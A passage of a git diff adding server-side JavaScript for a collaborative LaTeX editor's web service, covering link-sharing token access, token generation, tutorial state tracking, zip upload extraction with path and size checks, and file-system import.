(!TokenAccessHandler.isReadOnlyToken(token)) { + return res.sendStatus(400) + } + + const tokenType = TokenAccessHandler.TOKEN_TYPES.READ_ONLY + + const docPublishedInfo = + await TokenAccessHandler.promises.getV1DocPublishedInfo(token) + if (docPublishedInfo.allow === false) { + return res.json({ redirect: docPublishedInfo.published_path }) + } + try { + const [project, action, logData] = await checkAndGetProjectOrResponseAction( + tokenType, + token, + userId, + tokenHashPrefix, + req, + res, + next + ) + + TokenAccessHandler.checkTokenHashPrefix( + token, + tokenHashPrefix, + tokenType, + userId, + logData + ) + + if (action) { + return action() + } + if (!project) { + return next(new Errors.NotFoundError()) + } + + if (!confirmedByUser) { + return res.json({ + requireAccept: { + projectName: project.name, + }, + }) + } + + if (!project.tokenAccessReadOnly_refs.some(id => id.equals(userId))) { + await ProjectAuditLogHandler.promises.addEntry( + project._id, + 'join-via-token', + userId, + req.ip, + { privileges: 'readOnly' } + ) + } + + await TokenAccessHandler.promises.addReadOnlyUserToProject( + userId, + project._id, + project.owner_ref + ) + + return res.json({ + redirect: `/project/${project._id}`, + tokenAccessGranted: tokenType, + }) + } catch (err) { + return next( + OError.tag(err, 'error while trying to grant read-only token access', { + token, + }) + ) + } +} + +async function ensureUserCanUseSharingUpdatesConsentPage(req, res, next) { + const { Project_id: projectId } = req.params + const userId = SessionManager.getLoggedInUserId(req.session) + const project = await ProjectGetter.promises.getProject(projectId, { + owner_ref: 1, + }) + if (!project) { + throw new Errors.NotFoundError() + } + const isReadWriteTokenMember = + await CollaboratorsGetter.promises.userIsReadWriteTokenMember( + userId, + projectId + ) + if (!isReadWriteTokenMember) { + // If the user is not a read write token member, there are no actions to take + return AsyncFormHelper.redirect(req, res, `/project/${projectId}`) + } + const isReadWriteMember = + await CollaboratorsGetter.promises.isUserInvitedReadWriteMemberOfProject( + userId, + projectId + ) + if (isReadWriteMember) { + // If the user is already an invited editor, the actions don't make sense + return AsyncFormHelper.redirect(req, res, `/project/${projectId}`) + } + next() +} + +async function sharingUpdatesConsent(req, res, next) { + const { Project_id: projectId } = req.params + AnalyticsManager.recordEventForSession(req.session, 'notification-prompt', { + page: req.path, + name: 'link-sharing-collaborator', + }) + res.render('project/token/sharing-updates', { + projectId, + }) +} + +async function moveReadWriteToCollaborators(req, res, next) { + const { Project_id: projectId } = req.params + const userId = SessionManager.getLoggedInUserId(req.session) + const project = await ProjectGetter.promises.getProject(projectId, { + owner_ref: 1, + }) + const isInvitedMember = + await CollaboratorsGetter.promises.isUserInvitedMemberOfProject( + userId, + projectId + ) + const pendingEditor = + !(await LimitationsManager.promises.canAcceptEditCollaboratorInvite( + project._id + )) + await ProjectAuditLogHandler.promises.addEntry( + projectId, + 'accept-via-link-sharing', + userId, + req.ip, + { + privileges: pendingEditor + ? PrivilegeLevels.READ_ONLY + : PrivilegeLevels.READ_AND_WRITE, + tokenMember: true, + invitedMember: isInvitedMember, + ...(pendingEditor && { pendingEditor: true }), + } + ) + if (isInvitedMember) { + // Read only invited viewer who is gaining edit access via link sharing + await TokenAccessHandler.promises.removeReadAndWriteUserFromProject( + userId, + projectId + ) + await CollaboratorsHandler.promises.setCollaboratorPrivilegeLevel( + projectId, + userId, + pendingEditor + ? PrivilegeLevels.READ_ONLY + : PrivilegeLevels.READ_AND_WRITE, + { pendingEditor } + ) + } else { + // Normal case, not invited, joining via link sharing + await TokenAccessHandler.promises.removeReadAndWriteUserFromProject( + userId, + projectId + ) + await CollaboratorsHandler.promises.addUserIdToProject( + projectId, + undefined, + userId, + pendingEditor + ? PrivilegeLevels.READ_ONLY + : PrivilegeLevels.READ_AND_WRITE, + { pendingEditor } + ) + } + EditorRealTimeController.emitToRoom(projectId, 'project:membership:changed', { + members: true, + }) + res.sendStatus(204) +} + +async function moveReadWriteToReadOnly(req, res, next) { + const { Project_id: projectId } = req.params + const userId = SessionManager.getLoggedInUserId(req.session) + await ProjectAuditLogHandler.promises.addEntry( + projectId, + 'readonly-via-sharing-updates', + userId, + req.ip + ) + await TokenAccessHandler.promises.moveReadAndWriteUserToReadOnly( + userId, + projectId + ) + res.sendStatus(204) +} + +export default { + READ_ONLY_TOKEN_PATTERN: TokenAccessHandler.READ_ONLY_TOKEN_PATTERN, + READ_AND_WRITE_TOKEN_PATTERN: TokenAccessHandler.READ_AND_WRITE_TOKEN_PATTERN, + + tokenAccessPage: expressify(tokenAccessPage), + grantTokenAccessReadOnly: expressify(grantTokenAccessReadOnly), + grantTokenAccessReadAndWrite: expressify(grantTokenAccessReadAndWrite), + ensureUserCanUseSharingUpdatesConsentPage: expressify( + ensureUserCanUseSharingUpdatesConsentPage + ), + sharingUpdatesConsent: expressify(sharingUpdatesConsent), + moveReadWriteToCollaborators: expressify(moveReadWriteToCollaborators), + moveReadWriteToReadOnly: expressify(moveReadWriteToReadOnly), +} diff --git a/services/web/app/src/Features/TokenAccess/TokenAccessHandler.js b/services/web/app/src/Features/TokenAccess/TokenAccessHandler.js new file mode 100644 index 0000000..0d08903 --- /dev/null +++ b/services/web/app/src/Features/TokenAccess/TokenAccessHandler.js @@ -0,0 +1,362 @@ +const { Project } = require('../../models/Project') +const PublicAccessLevels = require('../Authorization/PublicAccessLevels') +const PrivilegeLevels = require('../Authorization/PrivilegeLevels') +const { ObjectId } = require('mongodb-legacy') +const Metrics = require('@overleaf/metrics') +const Settings = require('@overleaf/settings') +const logger = require('@overleaf/logger') +const V1Api = require('../V1/V1Api') +const crypto = require('crypto') +const { callbackifyAll } = require('@overleaf/promise-utils') +const Analytics = require('../Analytics/AnalyticsManager') + +const READ_AND_WRITE_TOKEN_PATTERN = '([0-9]+[a-z]{6,12})' +const READ_ONLY_TOKEN_PATTERN = '([a-z]{12})' + +const TokenAccessHandler = { + TOKEN_TYPES: { + READ_ONLY: PrivilegeLevels.READ_ONLY, + READ_AND_WRITE: PrivilegeLevels.READ_AND_WRITE, + }, + + ANONYMOUS_READ_AND_WRITE_ENABLED: + Settings.allowAnonymousReadAndWriteSharing === true, + + READ_AND_WRITE_TOKEN_PATTERN, + READ_ONLY_TOKEN_PATTERN, + + _makeReadAndWriteTokenUrl(token) { + return `/${token}` + }, + + _makeReadOnlyTokenUrl(token) { + return `/read/${token}` + }, + + makeTokenUrl(token) { + const tokenType = TokenAccessHandler.getTokenType(token) + if (tokenType === TokenAccessHandler.TOKEN_TYPES.READ_AND_WRITE) { + return TokenAccessHandler._makeReadAndWriteTokenUrl(token) + } else if (tokenType === TokenAccessHandler.TOKEN_TYPES.READ_ONLY) { + return TokenAccessHandler._makeReadOnlyTokenUrl(token) + } else { + throw new Error('invalid token type') + } + }, + + getTokenType(token) { + if (!token) { + return null + } + if (token.match(`^${TokenAccessHandler.READ_ONLY_TOKEN_PATTERN}$`)) { + return TokenAccessHandler.TOKEN_TYPES.READ_ONLY + } else if ( + token.match(`^${TokenAccessHandler.READ_AND_WRITE_TOKEN_PATTERN}$`) + ) { + return TokenAccessHandler.TOKEN_TYPES.READ_AND_WRITE + } + return null + }, + + isReadOnlyToken(token) { + return ( + TokenAccessHandler.getTokenType(token) === + TokenAccessHandler.TOKEN_TYPES.READ_ONLY + ) + }, + + isReadAndWriteToken(token) { + return ( + TokenAccessHandler.getTokenType(token) === + TokenAccessHandler.TOKEN_TYPES.READ_AND_WRITE + ) + }, + + isValidToken(token) { + return TokenAccessHandler.getTokenType(token) != null + }, + + tokenAccessEnabledForProject(project) { + return project.publicAccesLevel === PublicAccessLevels.TOKEN_BASED + }, + + async _projectFindOne(query) { + return await Project.findOne(query, { + _id: 1, + tokens: 1, + publicAccesLevel: 1, + owner_ref: 1, + name: 1, + tokenAccessReadOnly_refs: 1, + tokenAccessReadAndWrite_refs: 1, + }).exec() + }, + + async getProjectByReadOnlyToken(token) { + return await TokenAccessHandler._projectFindOne({ + 'tokens.readOnly': token, + }) + }, + + _extractNumericPrefix(token) { + return token.match(/^(\d+)\w+/) + }, + + _extractStringSuffix(token) { + return token.match(/^\d+(\w+)/) + }, + + async getProjectByReadAndWriteToken(token) { + const numericPrefixMatch = TokenAccessHandler._extractNumericPrefix(token) + if (!numericPrefixMatch) { + return null + } + const numerics = numericPrefixMatch[1] + + const project = await TokenAccessHandler._projectFindOne({ + 'tokens.readAndWritePrefix': numerics, + }) + + if (project == null) { + return null + } + + try { + if ( + !crypto.timingSafeEqual( + Buffer.from(token), + Buffer.from(project.tokens.readAndWrite) + ) + ) { + logger.err( + { projectId: project._id }, + 'read-and-write token match on numeric section, but not on full token' + ) + return null + } else { + return project + } + } catch (error) { + logger.err({ projectId: project._id, error }, 'error comparing tokens') + return null + } + }, + + async getProjectByToken(tokenType, token) { + if (tokenType === TokenAccessHandler.TOKEN_TYPES.READ_ONLY) { + return await TokenAccessHandler.getProjectByReadOnlyToken(token) + } else if (tokenType === TokenAccessHandler.TOKEN_TYPES.READ_AND_WRITE) { + return await TokenAccessHandler.getProjectByReadAndWriteToken(token) + } + throw new Error('invalid token type') + }, + + async addReadOnlyUserToProject(userId, projectId, ownerId) { + userId = new ObjectId(userId.toString()) + projectId = new ObjectId(projectId.toString()) + Analytics.recordEventForUserInBackground(userId, 'project-joined', { + role: PrivilegeLevels.READ_ONLY, + projectId: projectId.toString(), + source: 'link-sharing', + ownerId: ownerId.toString(), + mode: 'view', + }) + + return await Project.updateOne( + { + _id: projectId, + }, + { + $addToSet: { tokenAccessReadOnly_refs: userId }, + } + ).exec() + }, + + async removeReadAndWriteUserFromProject(userId, projectId) { + userId = new ObjectId(userId.toString()) + projectId = new ObjectId(projectId.toString()) + + return await Project.updateOne( + { + _id: projectId, + }, + { + $pull: { tokenAccessReadAndWrite_refs: userId }, + } + ).exec() + }, + + async moveReadAndWriteUserToReadOnly(userId, projectId) { + userId = new ObjectId(userId.toString()) + projectId = new ObjectId(projectId.toString()) + + return await Project.updateOne( + { + _id: projectId, + }, + { + $pull: { tokenAccessReadAndWrite_refs: userId }, + $addToSet: { tokenAccessReadOnly_refs: userId }, + } + ).exec() + }, + + grantSessionTokenAccess(req, projectId, token) { + if (!req.session) { + return + } + if (!req.session.anonTokenAccess) { + req.session.anonTokenAccess = {} + } + req.session.anonTokenAccess[projectId.toString()] = token + }, + + getRequestToken(req, projectId) { + const token = + req.session && + req.session.anonTokenAccess && + req.session.anonTokenAccess[projectId.toString()] + return token + }, + + async validateTokenForAnonymousAccess(projectId, token, callback) { + if (!token) { + return { isValidReadAndWrite: false, isValidReadOnly: false } + } + + const tokenType = TokenAccessHandler.getTokenType(token) + if (!tokenType) { + throw new Error('invalid token type') + } + + const project = await TokenAccessHandler.getProjectByToken(tokenType, token) + + if ( + !project || + !TokenAccessHandler.tokenAccessEnabledForProject(project) || + project._id.toString() !== projectId.toString() + ) { + return { isValidReadAndWrite: false, isValidReadOnly: false } + } + + // TODO: think about cleaning up this interface and its usage in AuthorizationManager + return { + isValidReadAndWrite: + tokenType === TokenAccessHandler.TOKEN_TYPES.READ_AND_WRITE && + TokenAccessHandler.ANONYMOUS_READ_AND_WRITE_ENABLED, + isValidReadOnly: tokenType === TokenAccessHandler.TOKEN_TYPES.READ_ONLY, + } + }, + + async getV1DocPublishedInfo(token) { + // default to allowing access + if (!Settings.apis.v1 || !Settings.apis.v1.url) { + return { allow: true } + } + + const { body } = await V1Api.promises.request({ + url: `/api/v1/overleaf/docs/${token}/is_published`, + }) + return body + }, + + async getV1DocInfo(token, v2UserId) { + if (!Settings.apis || !Settings.apis.v1) { + return { + exists: true, + exported: false, + } + } + + const v1Url = `/api/v1/overleaf/docs/${token}/info` + const { body } = await V1Api.promises.request({ url: v1Url }) + return body + }, + + createTokenHashPrefix(token) { + const hash = crypto.createHash('sha256') + hash.update(token) + return hash.digest('hex').slice(0, 6) + }, + + normalizeTokenHashPrefix(tokenHashPrefix) { + if (typeof tokenHashPrefix !== 'string') return '' + // remove (encoded) hash + tokenHashPrefix = tokenHashPrefix.replace('#', '').replace('%23', '') + // remove trailing special characters that were copied by accident + tokenHashPrefix = tokenHashPrefix.replace(/[^a-z0-9]+$/i, '') + return tokenHashPrefix + }, + + checkTokenHashPrefix(token, tokenHashPrefix, type, userId, logData = {}) { + let hashPrefixStatus + + tokenHashPrefix = + TokenAccessHandler.normalizeTokenHashPrefix(tokenHashPrefix) + + const v1Format = /%2F[0-9]{7,8}%2F/ + const isSuspectedV1Format = v1Format.test(tokenHashPrefix) + + if (!tokenHashPrefix) { + hashPrefixStatus = 'missing' + } else { + const expectedHashPrefix = TokenAccessHandler.createTokenHashPrefix(token) + if (expectedHashPrefix === tokenHashPrefix) { + hashPrefixStatus = 'match' + } else if (isSuspectedV1Format) { + hashPrefixStatus = 'mismatch-v1-format' + } else { + hashPrefixStatus = 'mismatch' + } + } + + if (hashPrefixStatus === 'mismatch') { + logger.info( + { + tokenHashPrefix, + hashPrefixStatus, + userId, + ...logData, + type, + }, + 'mismatched token hash prefix' + ) + } + + Metrics.inc('link-sharing.hash-check', { + path: type, + status: hashPrefixStatus, + }) + }, +} + +module.exports = { + ...TokenAccessHandler, + ...callbackifyAll(TokenAccessHandler, { + multiResult: { + validateTokenForAnonymousAccess: [ + 'isValidReadAndWrite', + 'isValidReadOnly', + ], + }, + without: [ + 'makeTokenUrl', + 'getTokenType', + 'isReadOnlyToken', + 'isReadAndWriteToken', + 'isValidToken', + 'tokenAccessEnabledForProject', + 'grantSessionTokenAccess', + 'getRequestToken', + 'createTokenHashPrefix', + 'normalizeTokenHashPrefix', + 'checkTokenHashPrefix', + '_makeReadAndWriteTokenUrl', + '_makeReadOnlyTokenUrl', + '_projectFindOne', + '_extractNumericPrefix', + '_extractStringSuffix', + ], + }), + promises: TokenAccessHandler, +} diff --git a/services/web/app/src/Features/TokenAccess/TokenAccessRouter.mjs b/services/web/app/src/Features/TokenAccess/TokenAccessRouter.mjs new file mode 100644 index 0000000..3f15650 --- /dev/null +++ b/services/web/app/src/Features/TokenAccess/TokenAccessRouter.mjs @@ -0,0 +1,31 @@ +import AuthenticationController from '../Authentication/AuthenticationController.js' +import AuthorizationMiddleware from '../Authorization/AuthorizationMiddleware.js' +import TokenAccessController from './TokenAccessController.mjs' + +export default { + apply(webRouter) { + webRouter.get( + `/project/:Project_id/sharing-updates`, + AuthenticationController.requireLogin(), + AuthorizationMiddleware.ensureUserCanReadProject, + TokenAccessController.ensureUserCanUseSharingUpdatesConsentPage, + TokenAccessController.sharingUpdatesConsent + ) + + webRouter.post( + `/project/:Project_id/sharing-updates/join`, + AuthenticationController.requireLogin(), + AuthorizationMiddleware.ensureUserCanReadProject, + TokenAccessController.ensureUserCanUseSharingUpdatesConsentPage, + TokenAccessController.moveReadWriteToCollaborators + ) + + webRouter.post( + `/project/:Project_id/sharing-updates/view`, + AuthenticationController.requireLogin(), + AuthorizationMiddleware.ensureUserCanReadProject, + TokenAccessController.ensureUserCanUseSharingUpdatesConsentPage, + TokenAccessController.moveReadWriteToReadOnly + ) + }, +} diff --git a/services/web/app/src/Features/TokenGenerator/TokenGenerator.js b/services/web/app/src/Features/TokenGenerator/TokenGenerator.js new file mode 100644 index 0000000..b9ebf16 --- /dev/null +++ b/services/web/app/src/Features/TokenGenerator/TokenGenerator.js @@ -0,0 +1,109 @@ +/* eslint-disable + n/handle-callback-err, + max-len, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. +/* + * decaffeinate suggestions: + * DS102: Remove unnecessary code created because of implicit returns + * DS207: Consider shorter variations of null checks + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +const crypto = require('crypto') +const V1Api = require('../V1/V1Api') +const Features = require('../../infrastructure/Features') +const Async = require('async') +const { promisify } = require('util') + +// (From Overleaf `random_token.rb`) +// Letters (not numbers! see generate_token) used in tokens. They're all +// consonants, to avoid embarassing words (I can't think of any that use only +// a y), and lower case "l" is omitted, because in many fonts it is +// indistinguishable from an upper case "I" (and sometimes even the number 1). +const TOKEN_LOWERCASE_ALPHA = 'bcdfghjkmnpqrstvwxyz' +const TOKEN_NUMERICS = '123456789' +const TOKEN_ALPHANUMERICS = + TOKEN_LOWERCASE_ALPHA + TOKEN_LOWERCASE_ALPHA.toUpperCase() + TOKEN_NUMERICS + +// This module mirrors the token generation in Overleaf (`random_token.rb`), +// for the purposes of implementing token-based project access, like the +// 'unlisted-projects' feature in Overleaf + +const TokenGenerator = { + _randomString(length, alphabet) { + const result = crypto + .randomBytes(length) + .toJSON() + .data.map(b => alphabet[b % alphabet.length]) + .join('') + return result + }, + + // Generate a 12-char token with only characters from TOKEN_LOWERCASE_ALPHA, + // suitable for use as a read-only token for a project + readOnlyToken() { + return TokenGenerator._randomString(12, TOKEN_LOWERCASE_ALPHA) + }, + + // Generate a longer token, with a numeric prefix, + // suitable for use as a read-and-write token for a project + readAndWriteToken() { + const numerics = TokenGenerator._randomString(10, TOKEN_NUMERICS) + const token = TokenGenerator._randomString(12, TOKEN_LOWERCASE_ALPHA) + const fullToken = `${numerics}${token}` + return { token: fullToken, numericPrefix: numerics } + }, + + generateReferralId() { + return TokenGenerator._randomString(16, TOKEN_ALPHANUMERICS) + }, + + generateUniqueReadOnlyToken(callback) { + if (callback == null) { + callback = function () {} + } + return Async.retry( + 10, + function (cb) { + const token = TokenGenerator.readOnlyToken() + + if (!Features.hasFeature('saas')) { + return cb(null, token) + } + + return V1Api.request( + { + url: `/api/v1/overleaf/docs/read_token/${token}/exists`, + json: true, + }, + function (err, response, body) { + if (err != null) { + return cb(err) + } + if (response.statusCode !== 200) { + return cb( + new Error( + `non-200 response from v1 read-token-exists api: ${response.statusCode}` + ) + ) + } + if (body.exists === true) { + return cb(new Error(`token already exists in v1: ${token}`)) + } else { + return cb(null, token) + } + } + ) + }, + callback + ) + }, +} + +TokenGenerator.promises = { + generateUniqueReadOnlyToken: promisify( + TokenGenerator.generateUniqueReadOnlyToken + ), +} +module.exports = TokenGenerator diff --git a/services/web/app/src/Features/Tutorial/TutorialController.mjs b/services/web/app/src/Features/Tutorial/TutorialController.mjs new file mode 100644 index 0000000..9afb5bb --- /dev/null +++ b/services/web/app/src/Features/Tutorial/TutorialController.mjs @@ -0,0 +1,52 @@ +import SessionManager from '../Authentication/SessionManager.js' +import TutorialHandler from './TutorialHandler.js' +import { expressify } from '@overleaf/promise-utils' + +const VALID_KEYS = [ + 'react-history-buttons-tutorial', + 'writefull-integration', + 'writefull-oauth-promotion', + 'bib-file-tpr-prompt', + 'ai-error-assistant-consent', + 'history-restore-promo', + 'us-gov-banner', + 'us-gov-banner-fedramp', +] + +async function completeTutorial(req, res, next) { + const userId = SessionManager.getLoggedInUserId(req.session) + const tutorialKey = req.params.tutorialKey + + if (!VALID_KEYS.includes(tutorialKey)) { + return res.sendStatus(404) + } + + await TutorialHandler.setTutorialState(userId, tutorialKey, 'completed') + res.sendStatus(204) +} + +async function postponeTutorial(req, res, next) { + const userId = SessionManager.getLoggedInUserId(req.session) + const tutorialKey = req.params.tutorialKey + let postponedUntil + if (req.body.postponedUntil) { + postponedUntil = new Date(req.body.postponedUntil) + } + + if (!VALID_KEYS.includes(tutorialKey)) { + return res.sendStatus(404) + } + + await TutorialHandler.setTutorialState( + userId, + tutorialKey, + 'postponed', + postponedUntil + ) + res.sendStatus(204) +} + +export default { + completeTutorial: expressify(completeTutorial), + postponeTutorial: expressify(postponeTutorial), +} diff --git a/services/web/app/src/Features/Tutorial/TutorialHandler.js b/services/web/app/src/Features/Tutorial/TutorialHandler.js new file mode 100644 index 0000000..6ffe9aa --- /dev/null +++ b/services/web/app/src/Features/Tutorial/TutorialHandler.js @@ -0,0 +1,62 @@ +const UserUpdater = require('../User/UserUpdater') + +const POSTPONE_DURATION_MS = 24 * 60 * 60 * 1000 // 1 day + +/** + * Change the tutorial state + * + * @param {string} userId + * @param {string} tutorialKey + * @param {'completed' | 'postponed'} state + * @param {Date} [postponedUntil] - The date until which the tutorial is postponed + */ +async function setTutorialState( + userId, + tutorialKey, + state, + postponedUntil = null +) { + const updateData = { + state, + updatedAt: new Date(), + } + + if (state === 'postponed' && postponedUntil) { + updateData.postponedUntil = postponedUntil + } + + await UserUpdater.promises.updateUser(userId, { + $set: { + [`completedTutorials.${tutorialKey}`]: updateData, + }, + }) +} + +/** + * Returns a list of inactive tutorials for a given user + * + * The user must be loaded with the completedTutorials property. + */ +function getInactiveTutorials(user, tutorialKey) { + const inactiveTutorials = [] + for (const [key, record] of Object.entries(user.completedTutorials ?? {})) { + if (record instanceof Date) { + // Legacy format: single date means the tutorial was completed + inactiveTutorials.push(key) + } else if (record.state === 'postponed') { + const defaultPostponedUntil = new Date( + record.updatedAt.getTime() + POSTPONE_DURATION_MS + ) + + const postponedUntil = record.postponedUntil ?? defaultPostponedUntil + if (new Date() < postponedUntil) { + inactiveTutorials.push(key) + } + } else { + inactiveTutorials.push(key) + } + } + return inactiveTutorials +} + +module.exports = { setTutorialState, getInactiveTutorials } diff --git a/services/web/app/src/Features/Uploads/ArchiveErrors.js b/services/web/app/src/Features/Uploads/ArchiveErrors.js new file mode 100644 index 0000000..d78941e --- /dev/null +++ b/services/web/app/src/Features/Uploads/ArchiveErrors.js @@ -0,0 +1,34 @@ +const Errors = require('../Errors/Errors') + +class InvalidZipFileError extends Errors.BackwardCompatibleError { + constructor(options) { + super({ + message: 'invalid_zip_file', + ...options, + }) + } +} + +class EmptyZipFileError extends InvalidZipFileError { + constructor(options) { + super({ + message: 'empty_zip_file', + ...options, + }) + } +} + +class ZipContentsTooLargeError extends InvalidZipFileError { + constructor(options) { + super({ + message: 'zip_contents_too_large', + ...options, + }) + } +} + +module.exports = { + InvalidZipFileError, + EmptyZipFileError, + ZipContentsTooLargeError, +} diff --git a/services/web/app/src/Features/Uploads/ArchiveManager.js b/services/web/app/src/Features/Uploads/ArchiveManager.js new file mode 100644 index 0000000..fc81fdb --- /dev/null +++ b/services/web/app/src/Features/Uploads/ArchiveManager.js @@ -0,0 +1,270 @@ +/* eslint-disable + n/handle-callback-err, + max-len, + no-return-assign, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. +/* + * decaffeinate suggestions: + * DS101: Remove unnecessary use of Array.from + * DS102: Remove unnecessary code created because of implicit returns + * DS207: Consider shorter variations of null checks + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +const logger = require('@overleaf/logger') +const OError = require('@overleaf/o-error') +const metrics = require('@overleaf/metrics') +const fs = require('fs') +const Path = require('path') +const yauzl = require('yauzl') +const Settings = require('@overleaf/settings') +const { + InvalidZipFileError, + EmptyZipFileError, + ZipContentsTooLargeError, +} = require('./ArchiveErrors') +const _ = require('lodash') +const { promisifyAll } = require('@overleaf/promise-utils') + +const ONE_MEG = 1024 * 1024 + +const ArchiveManager = { + _isZipTooLarge(source, callback) { + if (callback == null) { + callback = function () {} + } + callback = _.once(callback) + + let totalSizeInBytes = null + return yauzl.open(source, { lazyEntries: true }, function (err, zipfile) { + if (err != null) { + return callback(new InvalidZipFileError().withCause(err)) + } + + if ( + Settings.maxEntitiesPerProject != null && + zipfile.entryCount > Settings.maxEntitiesPerProject + ) { + return callback(null, true) // too many files in zip file + } + + zipfile.on('error', callback) + + // read all the entries + zipfile.readEntry() + zipfile.on('entry', function (entry) { + totalSizeInBytes += entry.uncompressedSize + return zipfile.readEntry() + }) // get the next entry + + // no more entries to read + return zipfile.on('end', function () { + if (totalSizeInBytes == null || isNaN(totalSizeInBytes)) { + logger.warn( + { source, totalSizeInBytes }, + 'error getting bytes of zip' + ) + return callback( + new InvalidZipFileError({ info: { totalSizeInBytes } }) + ) + } + const isTooLarge = totalSizeInBytes > ONE_MEG * 300 + return callback(null, isTooLarge) + }) + }) + }, + + _checkFilePath(entry, destination, callback) { + // transform backslashes to forwardslashes to accommodate badly-behaved zip archives + if (callback == null) { + callback = function () {} + } + const transformedFilename = entry.fileName.replace(/\\/g, '/') + // check if the entry is a directory + const endsWithSlash = /\/$/ + if (endsWithSlash.test(transformedFilename)) { + return callback() // don't give a destfile for directory + } + // check that the file does not use a relative path + for (const dir of Array.from(transformedFilename.split('/'))) { + if (dir === '..') { + return callback(new Error('relative path')) + } + } + // check that the destination file path is normalized + const dest = `${destination}/${transformedFilename}` + if (dest !== Path.normalize(dest)) { + return callback(new Error('unnormalized path')) + } else { + return callback(null, dest) + } + }, + + _writeFileEntry(zipfile, entry, destFile, callback) { + if (callback == null) { + callback = function () {} + } + callback = _.once(callback) + + return zipfile.openReadStream(entry, function (err, readStream) { + if (err != null) { + return callback(err) + } + readStream.on('error', callback) + readStream.on('end', callback) + + const errorHandler = function (err) { + // clean up before calling callback + readStream.unpipe() + readStream.destroy() + return callback(err) + } + + fs.mkdir(Path.dirname(destFile), { recursive: true }, function (err) { + if (err != null) { + return errorHandler(err) + } + const writeStream = fs.createWriteStream(destFile) + writeStream.on('error', errorHandler) + return readStream.pipe(writeStream) + }) + }) + }, + + _extractZipFiles(source, destination, callback) { + if (callback == null) { + callback = function () {} + } + callback = _.once(callback) + + return yauzl.open(source, { lazyEntries: true }, function (err, zipfile) { + if (err != null) { + return callback(err) + } + zipfile.on('error', callback) + // read all the entries + zipfile.readEntry() + + let entryFileCount = 0 + zipfile.on('entry', function (entry) { + return ArchiveManager._checkFilePath( + entry, + destination, + function (err, destFile) { + if (err != null) { + logger.warn( + { err, source, destination }, + 'skipping bad file path' + ) + zipfile.readEntry() // bad path, just skip to the next file + return + } + if (destFile != null) { + // only write files + return ArchiveManager._writeFileEntry( + zipfile, + entry, + destFile, + function (err) { + if (err != null) { + OError.tag(err, 'error unzipping file entry', { + source, + destFile, + }) + zipfile.close() // bail out, stop reading file entries + return callback(err) + } else { + entryFileCount++ + return zipfile.readEntry() + } + } + ) // continue to the next file + } else { + // if it's a directory, continue + return zipfile.readEntry() + } + } + ) + }) + // no more entries to read + return zipfile.on('end', () => { + if (entryFileCount > 0) { + callback() + } else { + callback(new EmptyZipFileError()) + } + }) + }) + }, + + extractZipArchive(source, destination, _callback) { + if (_callback == null) { + _callback = function () {} + } + const callback = function (...args) { + _callback(...Array.from(args || [])) + return (_callback = function () {}) + } + + return ArchiveManager._isZipTooLarge(source, function (err, isTooLarge) { + if (err != null) { + OError.tag(err, 'error checking size of zip file') + return callback(err) + } + + if (isTooLarge) { + return callback(new ZipContentsTooLargeError()) + } + + const timer = new metrics.Timer('unzipDirectory') + logger.debug({ source, destination }, 'unzipping file') + + return ArchiveManager._extractZipFiles( + source, + destination, + function (err) { + timer.done() + if (err != null) { + OError.tag(err, 'unzip failed', { + source, + destination, + }) + return callback(err) + } else { + return callback() + } + } + ) + }) + }, + + findTopLevelDirectory(directory, callback) { + if (callback == null) { + callback = function () {} + } + return fs.readdir(directory, function (error, files) { + if (error != null) { + return callback(error) + } + if (files.length === 1) { + const childPath = Path.join(directory, files[0]) + return fs.stat(childPath, function (error, stat) { + if (error != null) { + return callback(error) + } + if (stat.isDirectory()) { + return callback(null, childPath) + } else { + return callback(null, directory) + } + }) + } else { + return callback(null, directory) + } + }) + }, +} + +ArchiveManager.promises = promisifyAll(ArchiveManager) +module.exports = ArchiveManager diff --git a/services/web/app/src/Features/Uploads/FileSystemImportManager.js b/services/web/app/src/Features/Uploads/FileSystemImportManager.js new file mode 100644 index 0000000..22533af --- /dev/null +++ b/services/web/app/src/Features/Uploads/FileSystemImportManager.js @@ -0,0 +1,259 @@ +const fs = require('fs') +const Path = require('path') +const { callbackify } = require('util') +const EditorController = require('../Editor/EditorController') +const Errors = require('../Errors/Errors') +const FileTypeManager = require('./FileTypeManager') +const SafePath = require('../Project/SafePath') +const logger = require('@overleaf/logger') + +module.exports = { + addEntity: callbackify(addEntity), + importDir: callbackify(importDir), + importFile: callbackify(importDir), + promises: { + addEntity, + importDir, + importFile, + }, +} + +async function addDoc(userId, projectId, folderId, name, lines, replace) { + if (replace) { + const doc = await EditorController.promises.upsertDoc( + projectId, + folderId, + name, + lines, + 'upload', + userId + ) + return doc + } else { + const doc = await EditorController.promises.addDoc( + projectId, + folderId, + name, + lines, + 'upload', + userId + ) + return doc + } +} + +async function addFile(userId, projectId, folderId, name, path, replace) { + if (replace) { + const file = await EditorController.promises.upsertFile( + projectId, + folderId, + name, + path, + null, + 'upload', + userId + ) + return file + } else { + const file = await EditorController.promises.addFile( + projectId, + folderId, + name, + path, + null, + 'upload', + userId + ) + return file + } +} + +async function addFolder(userId, projectId, folderId, name, path, replace) { + const newFolder = await EditorController.promises.addFolder( + projectId, + folderId, + name, + 'upload', + userId + ) + await addFolderContents(userId, projectId, newFolder._id, path, replace) + return newFolder +} + +async function addFolderContents( + userId, + projectId, + parentFolderId, + folderPath, + replace +) { + if (!(await _isSafeOnFileSystem(folderPath))) { + logger.debug( + { userId, projectId, parentFolderId, folderPath }, + 'add folder contents is from symlink, stopping insert' + ) + throw new Error('path is symlink') + } + const entries = (await fs.promises.readdir(folderPath)) || [] + for (const entry of entries) { + if (await FileTypeManager.promises.shouldIgnore(entry)) { + continue + } + await addEntity( + userId, + projectId, + parentFolderId, + entry, + `${folderPath}/${entry}`, + replace + ) + } +} + +async function addEntity(userId, projectId, folderId, name, fsPath, replace) { + if (!(await _isSafeOnFileSystem(fsPath))) { + logger.debug( + { userId, projectId, folderId, fsPath }, + 'add entry is from symlink, stopping insert' + ) + throw new Error('path is symlink') + } + + if (await FileTypeManager.promises.isDirectory(fsPath)) { + const newFolder = await addFolder( + userId, + projectId, + folderId, + name, + fsPath, + replace + ) + return newFolder + } + + // Here, we cheat a little bit and provide the project path relative to the + // folder, not the root of the project. This is because we don't know for sure + // at this point what the final path of the folder will be. The project path + // is still important for importFile() to be able to figure out if the file is + // a binary file or an editable document. + const projectPath = Path.join('/', name) + const importInfo 